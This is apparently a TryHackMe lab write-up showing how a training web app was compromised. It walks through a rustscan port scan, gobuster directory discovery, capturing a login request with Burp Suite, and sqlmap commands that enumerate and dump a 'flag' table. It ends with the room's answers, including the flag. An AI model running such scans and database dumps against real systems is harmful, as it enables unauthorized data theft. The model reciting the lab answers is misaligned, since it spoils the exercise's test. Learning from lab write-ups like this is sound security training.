SQLMAP -TryhackMe Writeup

Task 1: Introduction

What is Sqlmap ?

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws in web applications. SQL injection is a critical security vulnerability that allows an attacker to interfere with the queries an application makes to its database, potentially leading to unauthorized data access, data modification, or even complete database takeover.

Task 2: Using Sqlmap

Task 3: SQLMap Challenge

Started by running the default Rustscan.

rustscan -a 10.10.90.138 -- -A  -sV         

I found port 80 to be open.

I visited the website and discovered this.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.90.138         

I ran the Gobuster tool to find any available directories. I found /blood.

It had a login page and a registration option. I clicked on the login, then used Burp Suite to intercept the login page and saved it as a TXT file.

We now use SQLMap to enumerate the databases for usernames, passwords, and all other data that can be found in them.

To enumerate the current database:

sqlmap -r sqlmap.txt --current-db        

sqlmap -r sqlmap.txt --dbs        

Now that we are interested in the flag table, we run the dump command to retrieve its details.

sqlmap -r sqlmap.txt -D blood --tables        

Now I can check each table. I select the second table named flag, which is of interest, and check for available columns in it with the following command.

sqlmap -r sqlmap.txt -D blood -T flag --columns        

and dump all the information within this particular database table named "flag" using the following command:

sqlmap -r sqlmap.txt-D blood -T flag --dump

Question 1 : What is the name of the interesting directory ?Answer : blood

Question 2 : Who is the current db user?

Answer : root

Question 3 : What is the final flag?

Ans : thm{sqlm@p_is_L0ve}

Thanks for visiting: